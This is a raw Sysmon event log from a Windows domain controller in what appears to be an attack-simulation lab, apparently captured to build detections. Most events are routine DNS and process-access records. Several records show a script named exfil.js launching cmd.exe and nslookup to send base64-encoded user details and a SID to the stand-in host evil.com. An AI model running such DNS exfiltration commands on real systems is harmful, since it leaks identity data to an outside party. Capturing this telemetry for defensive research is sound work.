354300x8000000000000000217128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{00000000-0000-0000-0000-000000000000}7592<unknown process>-udpfalsefalse127.0.0.1-51444-false127.0.0.1-53domain 354300x8000000000000000217127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51444- 354300x8000000000000000217126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51444- 354300x8000000000000000217125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{00000000-0000-0000-0000-000000000000}7592<unknown process>-udptruefalse127.0.0.1-51444-false127.0.0.1-53domain 354300x8000000000000000217124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{00000000-0000-0000-0000-000000000000}7592<unknown process>-udpfalsefalse127.0.0.1-51443-false127.0.0.1-53domain 354300x8000000000000000217123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51443- 354300x8000000000000000217122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51443- 354300x8000000000000000217121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{00000000-0000-0000-0000-000000000000}7592<unknown process>-udptruefalse127.0.0.1-51443-false127.0.0.1-53domain 354300x8000000000000000217120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{00000000-0000-0000-0000-000000000000}7592<unknown process>-udpfalsefalse127.0.0.1-51442-false127.0.0.1-53domain 354300x8000000000000000217119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51442- 354300x8000000000000000217118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51442- 354300x8000000000000000217117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{00000000-0000-0000-0000-000000000000}7592<unknown process>-udptruefalse127.0.0.1-51442-false127.0.0.1-53domain 354300x8000000000000000217116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.293{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51441- 354300x8000000000000000217115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.293{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51441- 354300x8000000000000000217114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.293{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51440- 354300x8000000000000000217113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.293{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51440- 354300x8000000000000000217112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.292{00000000-0000-0000-0000-000000000000}2632<unknown process>-udpfalsefalse127.0.0.1-51439-false127.0.0.1-53domain 354300x8000000000000000217111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.292{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51439- 354300x8000000000000000217110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.292{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51439- 354300x8000000000000000217109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.292{00000000-0000-0000-0000-000000000000}2632<unknown process>-udptruefalse127.0.0.1-51439-false127.0.0.1-53domain 354300x8000000000000000217108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{00000000-0000-0000-0000-000000000000}4232<unknown process>-udpfalsefalse127.0.0.1-51438-false127.0.0.1-53domain 354300x8000000000000000217107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51438- 354300x8000000000000000217106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51438- 354300x8000000000000000217105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{00000000-0000-0000-0000-000000000000}4232<unknown process>-udptruefalse127.0.0.1-51438-false127.0.0.1-53domain 354300x8000000000000000217104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{00000000-0000-0000-0000-000000000000}4232<unknown process>-udpfalsefalse127.0.0.1-51437-false127.0.0.1-53domain 354300x8000000000000000217103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51437- 354300x8000000000000000217102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51437- 354300x8000000000000000217101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.158{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51436- 354300x8000000000000000217100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.157{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51436- 354300x8000000000000000217099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.026{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51435- 354300x8000000000000000217098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.025{00000000-0000-0000-0000-000000000000}6560<unknown process>-udptruefalse127.0.0.1-51435-false127.0.0.1-53domain 10341000x8000000000000000217097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.357{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-EB46-000000005F02}4832C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.357{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-EB46-000000005F02}4832C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.357{2E1864BB-1904-629A-EB46-000000005F02}48325208C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-EA46-000000005F02}7152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.342{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-EB46-000000005F02}4832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.342{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.342{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.342{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.342{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.342{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-EA46-000000005F02}7152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.342{2E1864BB-18E0-629A-6742-000000005F02}39766024C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-EA46-000000005F02}7152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.343{2E1864BB-1904-629A-EA46-000000005F02}7152C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlisogkz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.326{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlguchax.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.288{2E1864BB-1904-629A-E846-000000005F02}59363796C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-E946-000000005F02}1080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.288{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.288{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.288{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.288{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.288{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E946-000000005F02}1080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.288{2E1864BB-1904-629A-E746-000000005F02}3122244C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-E946-000000005F02}1080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.300{2E1864BB-1904-629A-E946-000000005F02}1080C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-E746-000000005F02}312C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlguchax.tmp 2>&1 10341000x8000000000000000217077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.273{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-E846-000000005F02}5936C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.273{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-E846-000000005F02}5936C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 